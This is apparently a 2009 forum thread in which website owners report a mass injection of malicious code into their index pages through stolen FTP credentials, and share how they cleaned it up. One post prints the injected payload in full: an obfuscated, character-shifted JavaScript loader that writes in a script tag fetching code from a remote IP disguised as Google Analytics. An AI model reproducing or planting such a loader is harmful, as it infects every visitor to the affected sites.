Please help I have found a mysterious code on a lot of my websites? Is this a hack?

Sorry, I meant run kaspersky on your local PC, just to be sure. There's no virus scanner , that I know off, that can be run on a shared host.

 

I'm on HostGator and found the same code on a site today too. The modified time on the file was 3/22/09.

The site is a junk domain I keep as a joke with friends, and the only thing on the front page is a photo. Its a flat HTML file, there's no dynamic content of any kind, so I'm sure they've somehow accessed my FTP.

I'm changing the passwords, and will report back if they manage to do it again. I'll update if I figure out what happened.

 

I have had same problem code found on 28th march. I host with easyspace so looks like it is affecting lots of web servers.

The code was placed on my home page, but it also was placed in log files.

Cleaned now and made password more secure, but my traffic has gone down massively because google has listed site as "This site may harm your computer" I have gone to google dashboard to resubmit site for inspection.

 

My guess is that these hacks are not done through FTP, but some server-side exploit.

 

This thread seems to be the best resource online for this problem, so I thought I'd add my findings here.
Several of the sites I maintain have had the same line of malicious code inserted at the bottom of main/obvious index files, inside its own html and script tags:

var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result);

The sites are hosted with various hosting companies, and some are simply static HTML, so this isn't due to weak PHP scripts or hosting security flaws. Having done some analysis this morning, here's what I can say:

- The attacks are done by FTP, and the attacker knows a/the FTP username and password (my server FTP logs show this)
- AFAIK, only default index pages (e.g. index.php and index.html) are affected - these can be in the root folder, subfolders, or the https webroot. It seems that the attacking script has a list of index files across the whole site (from a Google search perhaps?), then downloads each file by FTP, and re-uploads it with the obfuscated JavaScript inserted at the end.
- The attacks on my site mostly took place on March 23rd, from 209.124.81.18 (wh4.wiredhub.net, but also in the Dragon IP range), but some also took place on March 5th and 6th, from 67.151.214.228 (unresolved US address)
- I'm presuming that some sort of trojan or sniffer was present on my computer, listening for FTP passwords as I connected to my sites - this is because only my recently-updated sites have been hacked (though one hacked site was last-edited on Feb 9th 2009, so it's not just a problem from the last few days).
- I've scanned my PC with HijackThis, MalwareBytes Anti-Malware, and AVG, and all come up clean. I'll do some more tests and report if I find anything. The only strange behaviour I'd noticed on my PC recently (it's normally pretty secure), was lots of cmd.exe / net.exe / net1.exe processes opening - these seemed to be related to my online backup iDriveEtray. I also found that my firewall (Sunbelt/Kerio Personal Firewall) had been disabled from starting with Windows. So obviously something was awry on my computer.

Other info that may be relevant:
- I'm based in the UK, connected to Virgin Media broadband.
- I used FileZilla and PSPad to FTP to my websites (passwords were sent without encryption - lesson learned).
- I've not noticed any other issues with email/websites.

- To fix this problem, I checked my FTP logs to see which files had been edited, and removed the offending JavaScript from the end of each file (or else look for any files recently edited, in any folder, especially index files)
- I changed my FTP passwords for the hacked sites (as someone else clearly knows them)
- I also updated my servers (where possible) to allow FTP over SSL, so that passwords are sent encrypted.

Hope this helps people find out what's been happening to them, and some steps to help fix/prevent it.
Claude

 

Interesting. My FTP passwords are very random, but I don't have access to FTP logs as my site is on shared hosting. Given that my password is strong, and I'm the only who knows it, I still find the FTP theory (in my case) hard to believe. Possibly an FTP daemon exploit?

I use FileZilla too. FileZilla is open source so I'm guessing the software has not been compromised. My PC and LAN is definitely clear from viruses and malware.

 

I have the issue and i have to replace all my files, this took me a few days. .

 

I am still finding the code on other files, index.php, index.htm, index.html, footer.php, header.php, login.php, admin/index.php, admin/login.php, register.php. Seems to be a tracking code to track usernames and passwords. I got the guys at Heartinternet following it up for me, when I get some more info I will post to this thread. For now I would block the Dragonhost IP range as this is where the hack originally came from according to the ip that matches the login to my ftp account at the time of the hack.

One question I do have is can a proxy be used to access another ip host without their consent?

 

Absolutely. Blocking hackers by IP address is futile because they have access to countless different IP addresses.

 

I just hope that someone somewhere will find the absolute source to this attack as it has taken me a very long stressful time clearing this code and rebuilding deleted php. In the mean time, I would suggest that everyone checks their own sites for this code. It will be interesting to see exactly how many sites and different hosts have been infected by this hack, it will also help us to find the source.

 

This exploit must have something to do with compromised passwords (multiple compromised sites of the same owner on different hosts). Make sure to scan your computers for spyware and then change all passwords.

http://blog.unmaskparasites.com/2009/04/02/malicious-stats-from-84-244-138-0/

 

Why would so many passwords around the internet be compromised simultaneously?

 

Passwords are being compromised and collected by hackers over the time. Then they use the collected database to feed it to a network of zombie computers that inject malicious code into legitamate web pages. This way it looks as if it was simultaneously.

 

UseShots, that is a nice website you got there, very handy tool indeed, thank you. I suggest we all give it a go for every one of our sites.